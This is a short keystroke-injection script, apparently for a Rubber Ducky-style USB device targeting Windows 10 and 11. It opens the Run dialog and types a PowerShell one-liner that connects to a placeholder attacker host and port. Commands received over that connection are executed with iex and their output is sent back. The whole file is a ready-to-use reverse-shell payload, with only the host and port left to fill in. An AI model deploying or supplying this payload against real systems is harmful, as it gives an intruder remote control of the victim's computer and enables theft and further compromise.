REM     Title: Reverse-Shell-Win

REM     Author: cbk914

REM     Description: This payload is meant to open a reverse shell [Edit attacker-host and attacker-port]

REM     Target: Windows 10, 11
DELAY 1000
GUI r
DELAY 200
STRING powershell -c "& {$client = New-Object System.Net.Sockets.TCPClient('attacker-host',attacker-port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }"
ENTER
